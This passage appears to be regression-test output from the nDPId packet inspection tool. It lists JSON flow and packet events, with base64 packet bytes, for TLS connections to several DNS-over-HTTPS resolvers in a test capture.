uoqKDau0V16KSQWM2aCvsVesKQ3DSQJg5rL5yIwj9vpyWnaHxDEgfEIDmYjy\/Axgsm7vfVWFF3Jrfc1xzCpgVx2Wzxxl\/maZOzNTYwZUTU3hLDZjHHXTyifvb45snBjXrLw3E9kNt6T2lmZ7d2lzBq35OqiFyiqDdqg5nN+wvKg6FFTseFXwn\/Cnava4JqwJeCYBLZwtvjbxpmY\/Z7bzc6mZPg2Sh+dbDSkCl3bi0C7OGN4lTKk6SakWyrfvl60M9dBFHVDrzgKu7xbDvPEvSNcZq2Dx1QXy2oMyLZnD977uZ9nLe2MaP79hLJNgy4v+jriXtA5fuVRTABndd0eLGpCNoQRcyQEasclWVE0X3djEYjD5W2s+8ID+COBoWOoyP\/WAq9bDmdFuLbZL5YcQMg6OEX37+6VcGXh24mzLjiWqRW2SXZBECP5e9Kp+qBc4nsLJy+\/cCFFzWnnOIeDNkPzITjeYYG62LLpDcjihxenHjNkU8aI6W9z7HJRAKXj15JybI7ZavgKdsyBJSz8Rv17E9WgwJgE24FqtNa6LcXPjCIVJ4JA\/FRIvlJbq2\/PV2grzaPllz7EIQXESn4AAbsSK6v\/afg1rifhsSGv2yYjxwtRB5P9D+FT0dFjO2m9zDYEYLvFPNAv2\/uEF0d+ML9zrDfaDdz6z+wzZI7tOXb+ZgoELySqXWnZpXCKfAbAaRdkBWG9n\/7DEkPQfGc3BRuxecF3gZRN5TjRNnS3L\/z3Mjd0kgq5NvuPBzwr++r8PkzDyv4SrhrEho0ZXiTGQlO7AUNavDHJ2E6WcvB6wH6w+nDu+LafkJwVBrA3g2ry2AgWQYQlCtuH3p4tS5epl0vy3sOsnzjbAIulHq4VIitq5pO3s+sczN2QL3hoGMgZmvfNYCCppei2sMRM3JeTXdDamDavAss5ffhc7o9sFzFOhYwBHF3K+RDvF+\/0hY+kvloFXPT7w5qyKb029c\/+Vu3kK8iCqQMpkd\/Y7fPVoDJRSebia6NkOtp0QF10Wqdh2s0768F9ux8l3ns6Ahcvm\/CEcnhylTvqF1H8nFLoIPnLNfkqliriwfEB7qB8aB8psWMvXozj1u+xw79vKaBVDClx5kPg1ndY1UZCkXuVmLOZwvxWWc0tuTJcMVug1lNwCPKGUEoQ6IRWLIe8NCbqmkI6bW\/5Xu20soyB9iTbKgsh2xLBekpYgVl8gT8VGJflOjydyD64I9+T\/dXz5zy\/0oPQP9q2vSa5j"} +00943{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739299058,"flow_last_seen":946739299325,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":1693,"flow_avg_l4_payload_len":846,"midstream":1,"thread_ts_msec":946739299325,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53676,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh-2.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +02291{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":946739299325,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1406,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1406,"pkt_l4_len":1372,"thread_ts_msec":946739299325,"pkt":"ZmZmZmZmRERERERECABFAAVw+oVAACsGJZqLY95ICgAAAQG70awh+T4nvu0fvlAYAfmmIAAAiW51QuqEfobYElojzNdmal3NmvuNd\/aotOFuZKIcd+01MY62EHH7E56\/oxK0qr9J58d7Jfc491vr3AkBsKJZSE5EN1LMlpXioNrse464nnbj5nYCt1y8iJtaYVHfHT9x8ujbG\/T2N6ZekRm+ONP3O7xw3rubgw7ubQJF\/KHEiRVFPrbIwq5RI7VTRdfrd3b9Fc\/71kitl8ImBckYsh09FSa2nRQrqALNG43BNA+FPS+D4bALfGJGztFq32s2D2cWRj2vno7VjQQWYQsz+9R40cUHWMbbW0anf7aLopYHYwhAUnxfUJyLSGv\/hcuY1JoGSes4gPPm0w\/KvSPUfmH1XOcuJRdoXdElY5F\/m9je9IUq8euoPyf0PXU\/w6wn+q9PJNYNblwNWPVkVSF6bp87Ycrz+bZvhmrk3ipYYu58\/qf3ItMXsHiYNDHVbyhTOrrT84X2uXkA5ajgilxkHZCWJdDIvRFwT++59P5vI4krRFU0SPX1eygQdMslXLsxvfqQATVp3sK76bt8qHa8rMRVLCfPA3UPe8Z9q\/JNBVvEPCwFBWQICqqCApD7kqMSclaEy89K83LVugXlNfNOargw6YlUR36QNrsco2xSkkpbYZSag+guZDt8NaBOAQqx6Dtx5yS9ZeM2TaZ4Tva3cH5WwTw3nwMfyBrZkmKclliFlyL+l3\/Ft\/1cAhtU5U7a4LgYVbdqsQxRVbeUPAwUZ68y2BGyj5Xg8Mtci4mPsgh+bnyNL5K5y9jSltRS79PDJA87B7hqXTRUrELkxjFWaMPAzghsENt\/UjelVjAgSWUxzpqxPV+2hED3HVp9LJOBmZIcSEVN1eWHazkX+mtW2m+0GAsZaxamutLzgJh\/DRJa7Jw23fjV9PCXnj9MWSdJstPENtBI0OVh7PH0+uAGt1zxMdGzUgBU2QlNOO7S4UuYD0Y26DtfRFNsa3yyMMJMA4d1B+99D0rLBp+YTr6CIQlSGW7\/MY0mGzKXnXLKEBMjIoE76aJQADNrOQ1pUsHUbMNYSxpurIgJZbgBG3OALLoptMECW3PsCTpgXkQ2OmVE11D882PmbdA0f4acC7LQATIGoxF7ZIVK6E9Vi5\/LR0AueJFdtzLq+oc1+GpS8l4A7KvQzJjHl8BFVtlJFp5Ft91g8c86AHAIukg5AmfSwO3K4Rq0SXUs8KcP29aiI1bA7\/K0iAEMbAiDcRNwXEEo+uNEfshUZQDIyZoBHdLzMTL\/2s9ouLF90mtZTkbub4ko0oHCp0UBuhgnfDbrA69yTnP91yV8UR8xswBSaiV12vmMHeXGGKIJ6dQbgPNn5OzZbyefQz5\/sH6dHxYbcGGfd+8wSxfEi7DokbKnmTmetH85RkCusy06sJkhFgf9bhlEmk63Cet5cz7Z7ea9PrtiS\/xOPZoAmLR8AcrBNB\/tHpNVlFcTM+gO6pHXXYSwt1o+rdQxZT4lFn7kVxmARBzEGQB8TIogOkRi0YtdMrX\/cAGbQWx0wllwfDL\/JIISbxKwUNTT45zepGk3OVcnv0694KsAM6Pujlm7XvrZ+hcDAwB\/JlZfTL2CfKHweE8ivDA\/8Dj4s9MhpgBrmwa3P4sMMqXQFKgI6jQB7iGhbQGftnSVKI+QCxWleTjngiVWQbRq4xwswRPPuCr\/EteohSIpdjvjIjT4EQlykWjN3TxUSVyvVSA8Rp0nUkHXzRzNgRwt1EKIchjIYekan95L5wPtZxcDAwA1P8zjtyfqh9OaAN1qf+msLEHbyvTYhKC4e6LNeICCaSA3aHIsCQ1pZdcK52vQiTVTlBfFsLw="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304432,"flow_last_seen":946739304432,"flow_idle_time":7560000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"flow_avg_l4_payload_len":298,"midstream":1,"thread_ts_msec":946739304432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.95.218.42","src_port":50614,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00864{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":946739304432,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":352,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":352,"pkt_l4_len":318,"thread_ts_msec":946739304432,"pkt":"REREREREZmZmZmZmCABFAAFSUVZAAL0GFwkKAAABuV\/aKsW2AbtqjRCaK20m8FAYAfZViwAAFgMBASUBAAEhAwPqrEqAFBwbSYnmd5FQ4vhXWCXQOM7WSA+ydz5Uq2T7jCDruFBRjE\/ZRtIlov08nzXX8Izc\/f7Ut++FjeF3CgO25wAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACyAAAAIQAfAAAcZG5zLmRpZ2l0YWxlLWdlc2VsbHNjaGFmdC5jaAAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACDBZSA439npt9wjB\/Qij4hgUYqoHU3i8\/GsiDYDjRoMEQ=="} +00917{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304432,"flow_last_seen":946739304432,"flow_idle_time":7560000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"flow_avg_l4_payload_len":298,"midstream":1,"thread_ts_msec":946739304432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.95.218.42","src_port":50614,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.digitale-gesellschaft.ch","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +04390{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":946739304474,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739304474,"pkt":"ZmZmZmZmRERERERECABFAAuA8Y9AADUG9KG5X9oqCgAAAQG7xbYrbSbwao0RxFAQAfVfuQAAFgMDAHoCAAB2AwMcSuw\/xeEh9B9zohSBYXmLCSdYelc0PZguMzAQLdc5lyDruFBRjE\/ZRtIlov08nzXX8Izc\/f7Ut++FjeF3CgO25xMCAAAuACsAAgMEADMAJAAdACA9LiT1RQf61DUAcNgmrd9PJwh2JRIEeJ2AayVwYZe0VRQDAwABARcDAwAkpkFL6pYrY48v\/7oiAzlOAXfNYnXJT5\/VQ9ye3Jhdgfb\/qFcIFwMDDINDI+OvHUF+FRNUcqHGAtixa5OM3ESWY04brG7N5Xjztm8RaH\/MawsGpkLkwKimhVGQ6ciJhhX175QbHhfhLL45mnkevxxrQGot9ty+fzwVg7GUUCbrsUr32l6TD4OY9EXQQSyuoBvDePneEphgFWs2uB\/zEFQxJzZvf194T3VRrMXZftbpf\/YmEhwWBzhFxCXz7FBI47mE4BFAjuyUMEWUzwiwE55sybcBJQIrcz91caVnRcYmA1Wi1qK5uHVbVaqkF1jIcRZS6+N+xmFq9MBtbs1TttpF6z36PG19i1g1CIx8xl4wpaYvqDA7QOoSL5x3PMqBtb0k4c3Q\/zEwDdawR+TYy7hNCaHkQ1sAWum3cmhRVUAXu9xkbB0O3nyNloM3\/1BpKJAhKkuU\/V2kkZGB6Ql\/kS7sAxcWh603OAJFGoXqcwc2spjFNCK4ea9Hs8PmACV\/UTaJ7lrlVw2HKBfFrLZE4S2HECqocWhjyVs89\/VZtJDOJu7pXlvP6vYnAZ+sKU9FZHgQ29hFtZTpOUnFJKyIZ7qR3IrvVPATpVytUzMEEVKArnVXT6TYqqci\/q+Ob0fbpe70cziyO7QaX7DT+VhBEhzijRbBVrFLadSpyh0XwKqeuShTd5lBEg4jq+0xz6QU3AR+JKO5yFNIu3wqn66JM48D8VfHh\/P6zoK25bt+h0uyMx2Tdvz0o8sXcXOlNbkjxJTj+b3L48sroz1OixQLEwkGWR0YALDiDYZDaGEdLMJeKpDENsvWGjQzbcLGtxojF3IPZE5plenMHHam99lQcz7tOMhTuD0tu9K1ubLwoOk+K9ZSx+jQ\/y8OgEHvmzPhQqCD3uYFzKXprY15BXYSgVl4JkFtCc53KhrIqQpwfu8AGb8d7NaM+YwOO8C5+0rvVtZQVjay20f9c8RH+m7E+z6+gghCL2zO42Qf0EGAmfsmAKXMp6WNxCrd7mkU+MupYWwFGBmLvHH3Vl5XVJZL0bTZyhceC5c2NC8KJ3G3fmI41pUyCIqBiCF4naOVVb20hz4J7t7d4+3vNMlh9pkutkDtBUG\/sopbYKTD6kxhRU0nbMYNcJYsotavdtxk+5ricax8dlXTEQUyVGuU7VzQro6ZTS2J\/N+Dqw0JjCzhzZM4Iy+Zigsyz452Mxwn4H+POZW9AEa8UJIqsMXNYUOgxqdRZORU8gjSaaYtyhn4ZgPLYzJWev+UYEVbkQQlIs0qMsnDALKCKs\/vPLbMaZzLaWAeXOQBcQn6dRdSl1OHdjVYou9K0wNLFmi57+vod9Ufwp9xSCvh3ThgMiLBs9ntZ+DKnnpNK7K++8wDuLBmnbcYEnUZrZqGa8EXM5oLFPSizN87UN+K45Q\/S\/mtl3uxWe3MQN2DDd0vZIT\/pM6xA4vmgKQKhOGh1G\/LsJ4bGVvyfPbVWvvPsPMrkNeqwnVRFRE+JcuPLjNn3DyJRPv6SImnNR3F3p3NDu+U\/bZYbpfAqdtebmwkI6E92\/4EaRwnMS8jUU+nm4J3KxRiQRAHf2ic3MpHIJFU1alZ3UsqHJ6ixFmoZGKJNMub9RVwhhoMDob7lsWG2+BH4aWefcCL1wBXs4NIWJsY2Ws638ztVCok6ObVcpsMJe2l2ribLtt6uLyB1eEKfooGXoxgtbiHn8UI8BDgLRXpCnA7qK7wNCPv\/hXV\/5qObuA7HW\/C2qkSIpV\/R39i9wwVQ1ug1QIQz\/Ivm\/r6WLd0npdZrGVu5GBOJgUSRjnZQS5nqzdQ7xc5efsR5ICHi2XulsD+Zl3WQXVxYViEQMZNQRJCVpPIcx8YSgUINm5M6giDWQvYaHGMiifN+4pLOGo7UDtXSoYcIPou4kTo7mt5yFzAggk8EG0TmExkKN5uy8guvzoGiu3UmP1ayFSZA5TF4Hxgcg+2NpMUwTAvYDD0pW884S8fOW9HXDNECKzwG\/oVVn5NMUQqNCBUKpIkrq4caPrR60LP1G1fKKVz2Mf14oxUS6BYWLwcRFuY6LigPfz3Ch2bE\/jL+itDz+psExENk+g1PfaK4go+YhsmYCnhhZtTocVAIm+qVANsaIE47+Mr\/3qaOf1rseYxdMsxv04vxWH70UAraH7Y4AGe1DhKm55YgPg2VNLv+h443L3JtfuQRH1c2k3TEXhdwCAcDQH9W699eTwV8ntiQTxjZssTXuxQRFgjLr00HeNPNF7n2H9VgT8LsXQAt4\/i29eoQanjq3bUca84pwERHpxJCf8pS1a1KaFzMXvwUcJQOHW0Q\/N1pQGzvCpgH08Dx9GmHQ9KyzJ\/25WSu25QUZfal6F7L79g8iREwvmDUfy2lEv7mGnvWdhk02quVGsRpK9JEZQWo1rmsoDlNw4F7rXwD7R+U4RUfRyKkcbXPHiTg6YeMzcydsycniM9RaMjPPob9n1bk26ufx+9SlvlwwzqBTbOelsik5jIa525vbi5OIQxSrn0plookRa9xUJNwJ0omdn9j\/AW9IsSa86jM4scUrSMFbeKS4NfQDG9J4VYxzdoR7UNco77sa40\/zPWSa52BjRajNWVVhLj2o4JJQ1TdUu1\/Y89xmSzFKfGWeLSDj5A40mFHXGu4ywpzLC8Nndnau8G5aFKzcr\/e\/FYXUsoYZybTLRRgFBh9CldD2TTFeVueuq98o4ZVu+q1YYgsJKBwBBdV7ZQvj9\/cuG60fpzaNEiWJubkXSKKJvv74KXiPSXeDhQYLSS52OcrIzafNPniFrdcohvXMGEBoTJqcVbFo3+5iC13wm4mlmo+quy\/l2iSqCs4wxDhhSbLnO3Mj4Jo+xpM+BWcGCqCQkZM3XVKq9YiLnmUpBqToMdPk8pxszpPKZj1LhkprcBdvtCOBdOnwV08YRjPbT04P1DuRJXM7LDfWyxwk\/Is8GGMA1w6+\/RlaDUJ4QA8kKf62dGdodCfjoiQVkcxdXgak+xv+ho1izHEaG3Cxi3\/0JNNkwi2GYgruxc5fmKOdC4sqtkxC8j7I10mTh3+xdhudUBx0Sfr8yXq66S2KI88KrN3whtG4+sfGtAkvxG1DDMgti4zkfemFnlOATAqP5VRZM6U99yi4VhRBfczJTw1gBFetM1BkbvErs0YQl2nnzhNtTGtufXl2uHH4oKan\/xnak8wRRzvD04JQK431fn3TEvjjqMfQgcgW2JNC7Jyw7AYjY5nB5jUcAvogHpO11F1M9vRMop+cLQefP6yxy73IHNujTUtW4L99fDdjHVHLSrb7JdVLoGFBt3fFHLJFZwGyi73KaVuA8iLogqAdT6WIlJVQpMEOX0IGn7EhGzmKBzxPYnYlqqEBMEmrbIy10AsTQseVjaAzuWns\/HCPxtq5uB5ayh6r0SQlamctp8CNeSGkejLyD9InFUv\/cN6jEeAPw9ln90Uo+NcJcsUJLeRD+0uBhQVWKlzlgFrsdNHfyZgldWogT0yc5biAQ0YsfjTotPSED4mJ044\/CPZYxO\/WG1WatWJcgbBPZpTJOczqp0KaqRJnQpbibu0vaCcUf\/KqPXTh9mQWbhQvkie6BJSQGOWuxP4jMOKd9ZpnBr0kUhcDeMAPaBISZnWKXpcStlkCGJnAAKL5CAgF\/30XUkXB1LxIrTS74Ar8WfurKCvwBWG\/WZugVENhYI47kxJo12a6YH"} +00960{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739304432,"flow_last_seen":946739304474,"flow_idle_time":7560000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3202,"flow_avg_l4_payload_len":1601,"midstream":1,"thread_ts_msec":946739304474,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.95.218.42","src_port":50614,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns.digitale-gesellschaft.ch","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01589{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":946739304474,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":892,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":892,"pkt_l4_len":858,"thread_ts_msec":946739304474,"pkt":"ZmZmZmZmRERERERECABFAANu8ZFAADUG\/LG5X9oqCgAAAQG7xbYrbTJIao0RxFAYAfWPbQAAW0wo1H0j139pBXgBmTX+NlnQSaFEq5K3Pk3KVeGnXpOOLq4X08kQBuG8lGioiVe9QPOeM1XWvGxPlasRKFYrXBH86PGVaXAalDOEWJlV3PHRUUevw5fI6G+9XzuHkGZKTzPpIIOZ3iAzfHnVG3aTpqTBf7xHcc9kM1a8UHbmE4vJrXG9wa2HwWF2bcpsRjUYBUQxiid3MXG7FbSTEXHjqgO4LQdR6Xrrbq+Co3CdY49hyuqnRUiglv3ZkZvp\/BcnFskV9iJiOLBUK+jpAhnIdIbviFi78T5PQD4Tbyt8STzKJ4\/mkCRReunmywmmxKyYx8ErZcAkoKDR9IOJ3LCf8I8uzSUCcTKeSSnHS6ASYLDpWersQuLDgg3Is5Hb+2kMH37wQnKetidHgJqxmhLBaw+NX16ETkRc5vqPLeAmNQjzUjFZW029RGYPrEM\/M2aIcKp372plYpuhFsySXWIydCD9tqNCwZyquQ9nS3XV\/M4rQP8eJtxF8c+LbyHgf4cpoHUgBE4Qg\/rQ8QPjUfA1pwRPb\/2owpEEJi4RutXWP+JydB0D0ebOUJIyGUMSTIpJcFH2AKhLGUYE6NfckNeCzln4nEp2+qOXsbfMejtOZFyyhHVzHpRSbGA51CkajxcDAwEZGvKJBQnU\/r0Z9hIPhFlH3EC+7xZqS+s7+uQ2E96CDW5iU++SeFvwmMtUyG5rZZUMcBGpLzGamrlpIcWB85XVCU4gt4ssg9\/BdLmFwKiGqbmqVBGWt\/8gKtXdyHqS9eDrvNFNLvTrsxnC0XEzuTedB4Vu4WIaC7MUadYnyNgpkYSxjxFL6J71Xhm+92aoteroJN4zzFxDDd8rAkDnu1z+ZiBNnpB\/Gl8e1OMkCP6vsWHqZoCX9H9vn8tgHDIFyxXWqZDdxctsoUH7QrryxeYlvn1njblpv3w6tKj8ghJZAtQ3ko6UuvntUQvQpT48C+AbzDC+CMGpscAjbO2LKlP9fB1a9O37Dse31zOmm1FlQiiQCvlL1EpsgdEXAwMARSV8NSHQ2Cma7zLl9Np9i8ttiytzR2iGli71aKFmLcmNdXIXIfvH2D8Tx5IjanqSAuAMgykIOqh1u3rHE4swCwSQXoiMxQ=="} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":27,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304846,"flow_last_seen":946739304846,"flow_idle_time":7560000,"flow_min_l4_payload_len":290,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":290,"midstream":1,"thread_ts_msec":946739304846,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.147.50","src_port":55962,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00851{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":946739304846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":344,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":344,"pkt_l4_len":310,"thread_ts_msec":946739304846,"pkt":"REREREREZmZmZmZmCABFAAFKCqJAAL0GKn8KAAABM56TMtqaAbsV\/EiYhf03fVAYAfaIyQAAFgMBAR0BAAEZAwMDM0zFcZBVaq8jarHhMnn706tDCSlU6qIcSdmbVQbksCDb4Qi2Yz\/q0+XeTvQ9QWQ6+8m8vlFJqWD30N7xMHe76AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACqAAAAGQAXAAAUcmVzb2x2ZXItZXUubGVsdXguZmkABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAgp73dM21LptFd0ThW7be4\/uwlUqgVJQtqqMQYrFbmEGQ="} +00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304846,"flow_last_seen":946739304846,"flow_idle_time":7560000,"flow_min_l4_payload_len":290,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":290,"midstream":1,"thread_ts_msec":946739304846,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.147.50","src_port":55962,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"resolver-eu.lelux.fi","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +04708{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":946739304885,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":3185,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3185,"pkt_l4_len":3151,"thread_ts_msec":946739304885,"pkt":"ZmZmZmZmRERERERECABFAAxjgA1AADcGL\/sznpMyCgAAAQG72pqF\/Td9FfxJulAYAfWT4gAAFgMDAHoCAAB2AwOQkeJmPgfI+2\/Nb2YFPwnrh6xqnBenx5u8q1ZnyWqFbyDb4Qi2Yz\/q0+XeTvQ9QWQ6+8m8vlFJqWD30N7xMHe76BMBAAAuACsAAgMEADMAJAAdACAildRAk\/Ii9q568Shy0jK1lY4Sb1nfErCeFDdP5ao6KBQDAwABARcDAwAkQtxzjO6Y1fKC\/+pxVLm\/ix+V3OPJ68RUn+6KLdAjN0rm7jqVFwMDCjCAB4dDMRsvk08LXpiehq\/g9vbt8WAZZyX0IwUW7zm2s2JxksqGXN7MA4aQXMsXbea79jo4WvO3p6dz8ckR6\/GSVEFX2o1gGE3SmFE8bI1yIk7FWs3aYgxYwqLKQEvbN1ogdjJ6GVf+z5kiMwtt12G5tdTf7rSfZ3NH6Yk4oM8Elpl9VtGpp2o0FPfY8QB0bMd4GPEVRd4k3sqTgevSs5A\/CC4vXXDNw8uBoNAhPcBJ041jkXgJVSYm9QwFsJI4LdQTSOvpWGu8g3Q7\/FqYiPFofKEmMJ\/qdjv4rC472QK9MBOUQREh1M+X1zwZya0Ac0YwCKyp0B6QV8x8ZfPc4YWcPVw\/CzcsYjigSbp5JV0L4gyAue9Gh6S3YYS9bSWcQ6OYfhcUgIVrottiHisZ3rFZLnhHY2SXkUzy2eOnD3Qi87\/nZ2OjGdHVYvM8Yu4DBGax+k0RD3dyn9+WKeU6QKdkf0bt\/mxpZ+gCW+joqGHWhH8T8mliVYu97Vp1QkdwgpRB7hXYN0Y6CGFsBPw4pzAHjVBFBgDGgx3FLp+jHtYGS4QJXS1JHRsP\/ek1Bjr6PmHXQaaRrJ7LWjgQKI7Gha0EZqsq38SOF+eicMwDFpzc3B+5eNIjmjJW4NSel0FytKTt9ojc0NWkn0EYaG0EgY6+6x2nvzg5YX9tM13wZT\/oz2Ot9pPHCaabuHca2dbfesbpNetZkot4ox97XYVrqgngmst1PfSQmtM98M5ptnPmd\/sO4Q2zmY5zCyE4gqZJ\/jBMttfXco2\/5avcH7mX5ejSI27aNnLJexzSKXQ+JaOKITzvIhr9MApYef8a6mxmBG7KvaOHtWpBt2xvsdwkyGKaTSFivERAQJ3qVVpBnDVBNegKy8yEp45YgbraKILphly37eCzmeR8+BDQHM0\/olAhROBUZh\/RONZXvUkl5SKTRjHC2xvJNaeZYZ+hmdzytY6JxtjOWIkXJWGOQ1NLnp8ApIWyE\/uNNjzCwSksu7oipiMjp9\/TYKv3dTCD+5Ol7BQVVV99RWf0LzZ8iQzJsQx4OWgFzyT+Rx7ZVNnTGOrqRbAycjVipQHP7zlio12QWc9UNzJCxesOye7ivdDzyOxpzywnD3v8hSp\/9zPmf\/3ENHJgy8O34UUO06MOahgiokayYgWdjmVbemjxT1TryYu0gDna\/E6EV3qm9EmJk3uwiz6F8MD8T978R+EclF8jScCvS+0rc0myMoeeGSKvHZ59\/bY\/8uMlpK\/glxn4tf2FrEjMiwTYfD\/iCofxemvMkvC\/JJfgLtIuT4eRwYnzHY6tx9RKYdE3USzn4\/mm5qo5iJNIvjNV0kDlflg2at\/H0LoUPuAQDzKEIijJENcZ6pth1tAfPuzZbqzQybao7+N7tXszvfJs6XQ8U0IN8EKUruqqe63LmjAuODDmoGi5l1XKUHloz2N6Z0c6GOIMVwe3VD3oKEzis5\/IqukPTBIlPi3wM9hPvIjDsgqHeQuZwd0P2uGkmxxX+CQ\/eHLZcMkC6yXGIsoms\/DqqMmKImF+\/kg3KVbsOWynlp+qs+GRnuEe5Gwcck3bNanvNfRO2hnDlR3xxWpDeCDtY554dnKSdrEsmz56E3HZY7CS4xffa2qaRU9o8FE6oWceQ2YomJuE\/bMT3knxqniPrzl1K3GkigMh9J1i47zylUFJIasxWeeT4rnsrPdwO5pPpDZPDAhZZKqamf0Xxf7UyzOur5bQ0RGdSbDmjCGZUxwrcQgCzOocJ07C3y9f5\/cPHLy4Hcpi9nKHy5+zMgLxDuHh45d7g5aX2opBYeDFdZVkS